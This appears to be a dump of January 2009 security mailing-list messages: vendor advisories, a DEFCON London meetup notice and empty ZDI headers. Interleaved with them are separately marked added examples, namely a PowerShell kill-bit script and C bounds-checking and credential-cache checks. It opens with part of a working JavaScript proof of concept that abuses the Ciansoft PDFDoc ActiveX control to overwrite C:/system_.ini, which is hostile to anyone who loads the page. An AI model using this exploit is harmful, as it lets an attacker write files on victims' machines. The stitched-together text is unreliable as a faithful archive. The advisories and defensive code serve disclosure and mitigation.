/*
 Class PDFDoc
 GUID: {00E7C7F8-71E2-498A-AB28-A3D72FC74485}
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPStorage Safe:  Safe for untrusted: caller,data  
 KillBitSet: False
 vend0r : www.ciansoft.com
*/ 
try{
    var obj = document.getElementById('kupa');
    obj.AddPage(1);
    obj.SaveToFile("C:/system_.ini");
    window.alert('Aplauz !!! g0rion pownsYa l0l - n0wH Check ya C:');
} catch(err){  window.alert('Poc failed'); }
</script>
========================================================================================================================
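
The comment block in the PoC above records "KillBitSet: False" for the PDFDoc class. The PowerShell below is an added example, not part of the original post and not Ciansoft code: it reports and sets the Internet Explorer kill bit for that CLSID. The function names are hypothetical; the registry location and the 0x400 flag are the standard "ActiveX Compatibility" kill-bit mechanism.

```powershell
# Added example: audit and set the IE kill bit for the PDFDoc ActiveX class.
# The CLSID is taken from the PoC above; all function names are hypothetical.
$PdfDocClsid = '{00E7C7F8-71E2-498A-AB28-A3D72FC74485}'
$KillBit     = 0x400   # "Compatibility Flags" bit that stops IE from instantiating the control

# Native registry view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$CompatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-CompatFlags {
    param([Parameter(Mandatory)][string]$KeyPath)
    # A missing key or a missing value means no flags are set for this CLSID.
    if (-not (Test-Path -LiteralPath $KeyPath)) { return 0 }
    $item = Get-ItemProperty -LiteralPath $KeyPath -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return $item.'Compatibility Flags'
}

function Get-KillBitState {
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($root in $CompatRoots) {
        # Skip a view that does not exist (no Wow6432Node on 32-bit Windows).
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $key   = Join-Path $root $Clsid
        $flags = Get-CompatFlags -KeyPath $key
        [pscustomobject]@{
            Key        = $key
            Flags      = '0x{0:X8}' -f $flags
            KillBitSet = (($flags -band $KillBit) -ne 0)
        }
    }
}

function Set-KillBit {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($root in $CompatRoots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $key = Join-Path $root $Clsid
        if (-not $PSCmdlet.ShouldProcess($key, 'Set kill bit (0x400)')) { continue }
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the bit in so that any other compatibility flags already present are preserved.
        $flags = (Get-CompatFlags -KeyPath $key) -bor $KillBit
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value $flags -Type DWord
    }
}

# Report the current state for both registry views.
Get-KillBitState -Clsid $PdfDocClsid | Format-Table -AutoSize

# To apply the mitigation, run from an elevated prompt (drop -WhatIf to write):
# Set-KillBit -Clsid $PdfDocClsid -WhatIf
```

The kill bit only stops Internet Explorer from instantiating the control; other applications that use the component directly are unaffected.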

To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:006 ] openoffice.org
Date: Tue, 13 Jan 2009 09:53:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMmVh-00070D-52@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:006
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : openoffice.org
 Date    : January 13, 2009
 Affected: 2008.0, 2008.1
 _______________________________________________________________________

 Problem Description:

 A heap-based overflow in the functions that manipulate WMF and EMF
 files in OpenOffice.org documents enables remote attackers to execute
 arbitrary code via documents holding certain crafted WMF or EMF
 files (CVE-2008-2237) (CVE-2008-2238).

 This update provides the fix for these security issues. In addition,
 the openoffice.org-voikko package has been updated, as it depends on
 the openoffice.org packages.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2237
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:

 Mandriva Linux 2008.0/X86_64:

 Mandriva Linux 2008.1:

 Mandriva Linux 2008.1/X86_64:
 1b2764049d7f0f871ef59f8bc59a0d7c  2008.1/x86_64/openoffice.org64-l10n-zh_CN-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 24c984ce888562b3ca14397374b4cc29  2008.1/x86_64/openoffice.org64-l10n-zh_TW-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 c2ce6108f7c493088bf7c1d8a580768a  2008.1/x86_64/openoffice.org64-l10n-zu-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 db231aa9f280e4492cc893f47752a591  2008.1/x86_64/openoffice.org64-math-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 6355858d279a9f7dea46b5bfbcc2aca0  2008.1/x86_64/openoffice.org64-mono-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 fe1f98364dd30a1414f81344db9cd9a3  2008.1/x86_64/openoffice.org64-openclipart-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 e003862fa11281610b3da5b10d783d81  2008.1/x86_64/openoffice.org64-pyuno-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 68bf8636f6e3d488a1a6148fe7e6029b  2008.1/x86_64/openoffice.org64-style-andromeda-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 00b1759dcfb0bfbb96a5bd38272ff9e4  2008.1/x86_64/openoffice.org64-style-crystal-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 6c724536050b19d64bdecfeb01585b2d  2008.1/x86_64/openoffice.org64-style-hicontrast-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 deec1adf124f70305c47c915d618c91e  2008.1/x86_64/openoffice.org64-style-industrial-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 08aa4951c4227af0df9425b92e13da2d  2008.1/x86_64/openoffice.org64-style-tango-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ab282131dfb9061feff287c8e2d662ac  2008.1/x86_64/openoffice.org64-testtool-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 a92bc374dcc2158d63d18afcc7009c05  2008.1/x86_64/openoffice.org64-writer-2.4.1.10-1.2mdv2008.1.x86_64.rpm 
 b13fae74b49bcdf0c9f1228ee2ad8244  2008.1/SRPMS/openoffice.org-2.4.1.10-1.2mdv2008.1.src.rpm
 d71b49c8df8e4a44f3ba4604065a5e4d  2008.1/SRPMS/openoffice.org64-2.4.1.10-1.2mdv2008.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbJksmqjQ0CJFipgRAggCAKDhN89MtydfmMlnZ+SlJsKdRAwg3gCgunuq
jjNUFFroATEp1QCR5Dp9Kyo=kjL9
-----END PGP SIGNATURE-----

From - Tue Jan 13 13:42:17 2009
Message-ID: <496CDBBD.801@pirate-radio.org>
Date: Tue, 13 Jan 2009 18:21:49 +0000
From: Major Malfunction <majormal@pirate-radio.org>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk,
dc4420@dc4420.org
Subject: ANNOUNCE: DEFCON London - DC4420 - January meet - Thursday 15th Jan
 2009
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94.2/8861/Tue Jan 13 16:09:19 2009 on livid.thebunker.net
X-Virus-Status: Clean
X-Spam-Status: No, score=0.5 required=5.0 tests=AWL,BAYES_20,RDNS_DYNAMIC,
SPF_NEUTRAL,URI_HEX autolearn=no version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on livid.thebunker.net
Status:   

hi all!

here is an announcement, shamelessly cut & pasted from the website (i.e. 
alien wrote it really :)

Thursday 15th January.

Happy seasonal greetings and stuff.

The new year rolls in, the Govt 'crazy ideas' talking starts again - 
however here - sanity reigns and thus we bring you:

"Trampoliner - Automatically choosing return addresses for buffer 
overflow attacks" - Tom Keetch

"MUFFIN recipe: How to find software vulnerabilities on Microsoft OS"
"demo of firewire data leakage" - Guillaume Vissian

"Architecture Analysis." - Orac

"failed allocations, more interesting than pie" - xz

All welcome, and if it's your first time you will be talking. Make it a 
new year resolution to talk to someone you don't know at this meeting!

mailing list - login and look at the projects forum for details. the 
list will only accept posts from subscriber addresses! so if you send 
something and it doesn't appear, that's why...

Where?

Upstairs @ Glassblower 
http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z&iwloc=addr
42 Glasshouse St, Piccadilly, W1B 5JY

doors open from 7, speaking starts from 7.30 - please try and be prompt 
as some people need to go early to get trains back out of London.

we have private use of the whole of the upstairs till 11.30.

real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 
'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, 
Leffe. even more stuff on draught : Becks, Fosters, 1664

food menu is extensive and most importantly : they do Pie - but they 
stop serving at 9pm!

comment/participate at http://dc4420.org/

see you there!!!

cheers,
MM
-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

From - Tue Jan 13 14:42:17 2009
Date: Tue, 13 Jan 2009 14:13:30 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: product-announce@lists.rpath.com,
product-announce@lists.rpath.com, security-announce@lists.rpath.com,
update-announce@lists.rpath.com, security-announce@lists.rpath.com,
update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net,
full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2009-0006-1 samba samba-client samba-server samba-swat
Message-ID: <496ce7da.vtXGoebDMyNRARjA%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2009-0006-1
Published: 2009-01-13
Products:
    rPath Appliance Platform Linux Service 1
    rPath Appliance Platform Linux Service 2
    rPath Linux 1
    rPath Linux 2

Rating: Minor
Exposure Level Classification:
    Remote Non-deterministic Denial of Service
Updated Versions:
    samba=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba=conary.rpath.com@rpl:2/3.0.33-1.1-1
    samba-client=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba-client=conary.rpath.com@rpl:2/3.0.33-1.1-1
    samba-client=rap.rpath.com@rpath:linux-1/3.0.33-1-1
    samba-client=rap.rpath.com@rpath:linux-2/3.0.33-1-1
    samba-server=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba-server=conary.rpath.com@rpl:2/3.0.33-1.1-1
    samba-swat=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba-swat=conary.rpath.com@rpl:2/3.0.33-1.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2928

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4314

Description:
    In previous versions of the samba package, it may be possible for
    unauthenticated remote attackers to cause a denial of service in
    the smbd daemon, or to access the contents of some of the memory
    of the smbd daemon.  It is not known whether either of these
    vulnerabilities can be exploited in practice; this update fixes
    the bugs which may create these vulnerabilities.

http://wiki.rpath.com/Advisories:rPSA-2009-0006

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Tue Jan 13 15:22:17 2009
Message-ID: <496CF12D.4080308@idefense.com>
Date: Tue, 13 Jan 2009 14:53:17 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller 'symWidths' Heap Overflow Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In
Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an
attacker to execute arbitrary code with the privileges of the affected
service, usually SYSTEM.

The vulnerability occurs when parsing a certain stream inside of a PDF
file. During parsing, a heap buffer is filled up without properly
checking to see whether the buffer is large enough to hold the current
value. By inserting a large number of values, it is possible to
overflow the buffer, and corrupt object pointers. This can lead to
pointers being controlled, which results in the execution of arbitrary
code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must email an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

Exploitation of heap overflow vulnerabilities on modern operating
systems can be difficult due to heap integrity checks. However, the
code in the PDF Distiller offers a wide variety of application specific
targets for overwriting. By sculpting the heap it is possible to place
pointers in the buffer and use these to gain arbitrary code execution.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

RIM has released a patch which addresses this issue. For more
information, consult their advisories at the following URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbPEtbjs6HoxIfBkRArA9AKC+HHRI4yTyX1qfKI3Risx2rBLebQCgov2e
h0GBEHCHYZuz6nAR3JE3DEA=0wb6
-----END PGP SIGNATURE-----
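
Added example, not part of the iDefense advisory and not RIM's code: the bug class from section II (values parsed from a stream and stored into a heap buffer) with the capacity check in place. The names width_table and parse_widths and the sample inputs are hypothetical.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

enum { PARSE_MALFORMED = -1, PARSE_TOO_MANY = -2 };

/* Hypothetical destination for values read from a stream. */
struct width_table {
    long   *values;    /* heap buffer */
    size_t  capacity;  /* slots allocated */
    size_t  count;     /* slots in use */
};

int width_table_init(struct width_table *t, size_t capacity)
{
    t->values = NULL;
    t->capacity = 0;
    t->count = 0;
    if (capacity == 0)
        return -1;
    /* calloc rejects a capacity * size product that would overflow. */
    t->values = calloc(capacity, sizeof *t->values);
    if (t->values == NULL)
        return -1;
    t->capacity = capacity;
    return 0;
}

void width_table_free(struct width_table *t)
{
    free(t->values);
    t->values = NULL;
    t->capacity = 0;
    t->count = 0;
}

/*
 * Parse whitespace-separated decimal integers from `stream` into `t`.
 * Returns the number of values stored, PARSE_MALFORMED for a token that
 * is not a number, or PARSE_TOO_MANY when the input holds more values
 * than the buffer has slots.
 */
long parse_widths(const char *stream, struct width_table *t)
{
    const char *p = stream;

    t->count = 0;
    for (;;) {
        char *end;
        long v;

        while (*p == ' ' || *p == '\t' || *p == '\r' || *p == '\n')
            p++;
        if (*p == '\0')
            break;

        errno = 0;
        v = strtol(p, &end, 10);
        if (end == p || errno == ERANGE)
            return PARSE_MALFORMED;

        /* The check the advisory describes as missing: without it the
         * store below runs past the end of the heap allocation once the
         * input supplies more values than `capacity`. */
        if (t->count >= t->capacity)
            return PARSE_TOO_MANY;

        t->values[t->count++] = v;
        p = end;
    }
    return (long)t->count;
}

int main(void)
{
    struct width_table t;

    if (width_table_init(&t, 4) != 0)
        return 1;
    /* Constructed sample inputs. */
    printf("short input: %ld\n", parse_widths("10 20 30", &t));
    printf("long input:  %ld\n", parse_widths("1 2 3 4 5 6 7 8", &t));
    width_table_free(&t);
    return 0;
}
```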

From - Tue Jan 13 15:32:17 2009
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution
 Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF5236BF80.C66B88FC-ON8525753D.006E111F-8625753D.006E387C@3com.com>
From: zdi-disclosures@3com.com
Date: Tue, 13 Jan 2009 14:03:55 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/13/2009 12:03:59 PM,
Serialize complete at 01/13/2009 12:03:59 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   
From - Tue Jan 13 15:42:17 2009
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution
 Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFEE76763C.83A19352-ON8525753D.006E0FF4-8625753D.006E3A7D@3com.com>
From: zdi-disclosures@3com.com
Date: Tue, 13 Jan 2009 14:04:00 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/13/2009 12:04:03 PM,
Serialize complete at 01/13/2009 12:04:03 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   
From - Tue Jan 13 16:12:17 2009
Date: Tue, 13 Jan 2009 13:44:47 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com,
update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2009-0005-1 git gitweb
Message-ID: <496ce11f.tdN1NmCfTiE6P8DX%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2009-0005-1
Published: 2009-01-13
Products:
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Unauthorized Access
Updated Versions:
    git=conary.rpath.com@rpl:2/1.5.6.6-0.1-1
    gitweb=conary.rpath.com@rpl:2/1.5.6.6-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2936

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5517
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5516

Description:
    In previous versions of the git package, insufficient quoting of
    shell characters allowed remote attackers to execute arbitrary
    commands via the git web interface.  This has been resolved.

http://wiki.rpath.com/Advisories:rPSA-2009-0005

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Tue Jan 13 16:22:17 2009
Date: Tue, 13 Jan 2009 13:46:43 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com,
update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2009-0007-1 pam_krb5
Message-ID: <496ce193.docOvfWnQX+ygHWi%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2009-0007-1
Published: 2009-01-13
Products:
    rPath Linux 2

Rating: Severe
Exposure Level Classification:
    Local Root Deterministic Privilege Escalation
Updated Versions:
    pam_krb5=conary.rpath.com@rpl:2/2.2.11-4.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2929

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825

Description:
    When the existing_ticket option is enabled, previous versions of the
    pam_krb5 package use incorrect privileges when reading a Kerberos
    credential cache, which allows other local users to gain privileges
    by setting the KRB5CCNAME environment variable to an arbitrary cache
    filename and running the su or sudo program.  It may be possible to
    mount a similar attack using sshd if sshd is configured insecurely,
    but such a configuration will be otherwise vulnerable and so this
    is not considered relevant.
    
    rPath Linux does not ship with the existing_ticket option enabled
    by default, and therefore is by default not vulnerable to this attack.

http://wiki.rpath.com/Advisories:rPSA-2009-0007

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
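
Added example, not part of the rPath advisory and not the pam_krb5 fix: one way a privileged program can refuse a KRB5CCNAME cache that does not belong to the invoking user, checking the opened descriptor rather than the path. The function open_ccache_checked and its result codes are hypothetical, and only FILE-type caches are handled.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

enum ccache_check {
    CC_OK = 0,
    CC_UNSUPPORTED,   /* empty name or a cache type other than FILE */
    CC_OPEN_FAILED,   /* missing file, symlink, or no permission */
    CC_NOT_REGULAR,   /* FIFO, device, directory, ... */
    CC_WRONG_OWNER,   /* file belongs to a different user */
    CC_LOOSE_MODE     /* readable or writable by group/other */
};

/*
 * Open the credential cache named by `ccname` (the KRB5CCNAME value,
 * either "FILE:/path" or a bare path) only if it is a regular file owned
 * by `uid` with no group/other permission bits. Returns a descriptor the
 * caller must read the cache from (so the checked file is the file used),
 * or -1 with the reason stored in *why.
 */
int open_ccache_checked(const char *ccname, uid_t uid, enum ccache_check *why)
{
    const char *path = ccname;
    struct stat st;
    int fd;

    *why = CC_UNSUPPORTED;
    if (ccname == NULL || *ccname == '\0')
        return -1;
    if (strncmp(ccname, "FILE:", 5) == 0)
        path = ccname + 5;
    else if (strchr(ccname, ':') != NULL)
        return -1;                      /* MEMORY:, KEYRING:, DIR:, ... */

    /* O_NOFOLLOW: a symlink to someone else's cache is refused.
     * O_NONBLOCK: opening a FIFO planted at the path does not hang. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) {
        *why = CC_OPEN_FAILED;
        return -1;
    }

    /* fstat the descriptor, not the path, so the file cannot be swapped
     * between the check and the read. */
    if (fstat(fd, &st) != 0)
        *why = CC_OPEN_FAILED;
    else if (!S_ISREG(st.st_mode))
        *why = CC_NOT_REGULAR;
    else if (st.st_uid != uid)
        *why = CC_WRONG_OWNER;
    else if (st.st_mode & (S_IRWXG | S_IRWXO))
        *why = CC_LOOSE_MODE;
    else
        *why = CC_OK;

    if (*why != CC_OK) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    enum ccache_check why;
    const char *cc = getenv("KRB5CCNAME");
    /* getuid() is the real uid: the user who ran the setuid program. */
    int fd = open_ccache_checked(cc, getuid(), &why);

    printf("KRB5CCNAME=%s -> %s (code %d)\n", cc ? cc : "(unset)",
           fd >= 0 ? "accepted" : "refused", (int)why);
    if (fd >= 0)
        close(fd);
    return 0;
}
```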

From - Tue Jan 13 17:02:17 2009
Subject: [USN-708-1] HPLIP vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Date: Tue, 13 Jan 2009 15:50:26 -0500

===========================================================
Ubuntu Security Notice USN-708-1           January 13, 2009
hplip vulnerability
https://launchpad.net/bugs/191299
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  hplip                           2.7.7.dfsg.1-0ubuntu5.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that an installation script in the HPLIP package would
change permissions on the hplip config files located in users' home directories.
A local user could exploit this and change permissions on arbitrary files
upon an HPLIP installation or upgrade, which could lead to root privileges.


Updated packages for Ubuntu 7.10:



From - Tue Jan 13 17:12:17 2009
Date: Tue, 13 Jan 2009 16:00:35 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller 'bitmaps' Heap Overflow Vulnerability

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

